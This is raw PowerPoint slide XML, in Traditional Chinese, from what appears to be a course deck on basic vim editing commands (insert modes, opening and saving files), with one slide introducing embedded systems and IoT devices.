              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>鍵切換到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>insert mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>：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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>編寫文件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38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2800" dirty="0"/>
              <a:t>其實要切換到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>insert mode, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>除了按 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>鍵外</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>還可以按 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>[a] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>[o] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>鍵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>筆者將三者的差別整理如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>按 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0" smtClean="0"/>
              <a:t>[A] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>鍵：從目前游標所在位置移動到最後字元開始輸入。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>按 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0" smtClean="0"/>
              <a:t>[a] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>鍵：從目前游標所在位置的下一個字元開始輸入。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>按 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0" smtClean="0"/>
              <a:t>[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] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>鍵：由游標之前加入資料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>按 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0" smtClean="0"/>
              <a:t>[I] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>鍵：由該行之首加入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>資料</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>按 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0" smtClean="0"/>
              <a:t>[o] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>鍵：將原本一行資料移到下一行，並在原本行開始輸入。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>按 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>[O] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>鍵：新增加一行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>並將游標移到下一行的開頭。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="28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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>編寫文件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1025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846" y="1481138"/>
            <a:ext cx="5632308" cy="4525962"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>編寫文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1619672" y="5661248"/>
            <a:ext cx="1368152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0213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嵌入</a:t>
            </a:r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式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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003232" cy="5434081"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>遷入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>機械或電器內部、具有專一功能和即時計算效能的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>電腦系統，賦予上網功能就成為物聯網設備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oT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Internet of Thing)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r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>達成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>目標</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>低生產成本、高</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>生產力、快速上市、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>超</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>系統核心、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>低運算能力、長續航力、低容量記憶空間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lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>嵌入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>作業系統</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:RT-thread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uClinux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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Apple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Iphone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r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、Andriod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(HTC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>相關產品</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>智慧型家電、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Arduino</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>開發板、樹梅派</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Raspberry Pi)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、相機、網通設備</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(cisco)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、工業</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>電腦</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(IPC)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endParaRPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="文字方塊 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4757760" y="3840328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容易</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>產生資安問</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>題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筆跡 7"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6335640" y="2090160"/>
              <a:ext cx="58140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319800" y="2026440"/>
                <a:ext cx="6130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828800" y="2586600"/>
              <a:ext cx="5891760" cy="65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812960" y="2522880"/>
                <a:ext cx="592344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658240" y="3174120"/>
              <a:ext cx="1816200" cy="46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642400" y="3110760"/>
                <a:ext cx="184788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212080" y="3148200"/>
              <a:ext cx="1476360" cy="720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196240" y="3084480"/>
                <a:ext cx="150804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400160" y="3206880"/>
              <a:ext cx="13320" cy="13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84320" y="3143520"/>
                <a:ext cx="450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7393680" y="3193920"/>
              <a:ext cx="1672200" cy="9828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377840" y="3130200"/>
                <a:ext cx="170388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907280" y="3677040"/>
              <a:ext cx="2488680" cy="788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891440" y="3613680"/>
                <a:ext cx="252036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709160" y="3611880"/>
              <a:ext cx="1274040" cy="198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693320" y="3548520"/>
                <a:ext cx="13057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7067160" y="3631320"/>
              <a:ext cx="1104120" cy="986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051320" y="3567960"/>
                <a:ext cx="113580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672840" y="4193280"/>
              <a:ext cx="470520" cy="68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57000" y="4129560"/>
                <a:ext cx="502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1802880" y="4179960"/>
              <a:ext cx="2527920" cy="6588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786680" y="4116600"/>
                <a:ext cx="255996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5956560" y="4167000"/>
              <a:ext cx="1679040" cy="72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940720" y="4103640"/>
                <a:ext cx="171072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2795400" y="718560"/>
              <a:ext cx="4160880" cy="1112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2779560" y="654840"/>
                <a:ext cx="4192560" cy="23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1005840" y="1593720"/>
              <a:ext cx="575280" cy="68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90000" y="1530000"/>
                <a:ext cx="6069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1861560" y="1593720"/>
              <a:ext cx="424800" cy="68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1845720" y="1530000"/>
                <a:ext cx="4564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3011040" y="1573920"/>
              <a:ext cx="549000" cy="2664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995200" y="1510560"/>
                <a:ext cx="5806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5904360" y="1580760"/>
              <a:ext cx="1469880" cy="1980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5888520" y="1517040"/>
                <a:ext cx="150156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7811640" y="1613160"/>
              <a:ext cx="496800" cy="2016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795800" y="1549800"/>
                <a:ext cx="5284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881640" y="2070360"/>
              <a:ext cx="457560" cy="3960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65800" y="2007000"/>
                <a:ext cx="48924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1260720" y="2031120"/>
              <a:ext cx="1019160" cy="2016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1244880" y="1967760"/>
                <a:ext cx="105084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8" name="筆跡 27"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5284080" y="2044440"/>
              <a:ext cx="1365480" cy="4608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5268240" y="1980720"/>
                <a:ext cx="13971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9" name="筆跡 28"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="979920" y="3624840"/>
              <a:ext cx="300600" cy="684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963720" y="3561480"/>
                <a:ext cx="3326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1" name="筆跡 30"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4859280" y="3598920"/>
              <a:ext cx="1711800" cy="65520"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="31" name="筆跡 30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4843440" y="3535200"/>
                <a:ext cx="174348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2" name="筆跡 31"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4905000" y="4075560"/>
              <a:ext cx="3142080" cy="118080"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="32" name="筆跡 31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889160" y="4012200"/>
                <a:ext cx="317376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5" name="筆跡 4"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1593720" y="1644480"/>
              <a:ext cx="2838960" cy="259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1577880" y="1581120"/>
                <a:ext cx="28706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6" name="筆跡 5"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2819520" y="3048120"/>
              <a:ext cx="1225800" cy="1144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2803680" y="2984400"/>
                <a:ext cx="125748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7" name="筆跡 6"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5334120" y="3092400"/>
              <a:ext cx="101628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5318280" y="3029040"/>
                <a:ext cx="1047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33" name="筆跡 32"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1784520" y="3619440"/>
              <a:ext cx="2248200" cy="45000"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="33" name="筆跡 32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1768320" y="3556080"/>
                <a:ext cx="228024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34" name="筆跡 33"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4826160" y="3625920"/>
              <a:ext cx="1295640" cy="12960"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="34" name="筆跡 33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4809960" y="3562200"/>
                <a:ext cx="13276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35" name="筆跡 34"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7004160" y="3543120"/>
              <a:ext cx="990720" cy="57600"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="35" name="筆跡 34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6988320" y="3479760"/>
                <a:ext cx="10224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36" name="筆跡 35"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1981080" y="4013280"/>
              <a:ext cx="2292840" cy="63720"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="36" name="筆跡 35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965240" y="3949560"/>
                <a:ext cx="232452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37" name="筆跡 36"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4819680" y="4133880"/>
              <a:ext cx="1708560" cy="89280"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="37" name="筆跡 36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4803840" y="4070520"/>
                <a:ext cx="17402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38" name="筆跡 37"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5695920" y="2013120"/>
              <a:ext cx="1975320" cy="32040"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="38" name="筆跡 37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5680080" y="1949400"/>
                <a:ext cx="2007000" cy="15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943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如果您在進入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>之後</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>想要開啟既有的檔案 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>例如要開啟 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>目錄中的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>text.txt), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>可以按 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>[:] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>鍵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>進入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>command-line mode, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>然後輸入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>"e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>檔案的路徑及名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>若要開啟新檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>請在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>command-line mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>輸入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>"n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>檔案的路徑及名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>"</a:t>
            </a:r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/>
              <a:t>進入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>後</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如何</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>開啟既有文字檔？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864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408" y="1481138"/>
            <a:ext cx="5611183" cy="4525962"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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進入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>vim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>後</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>如何開啟既有文字檔？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1652776" y="5661248"/>
            <a:ext cx="1767095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7847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編寫好文件之後</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>接下來便要存檔及離開 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>vim, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>請按 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>[ESC] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>鍵回到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>normalmode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>然後按 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>[:] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>鍵進入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>command-line mode, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>輸入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>"w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>檔案的路徑及名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
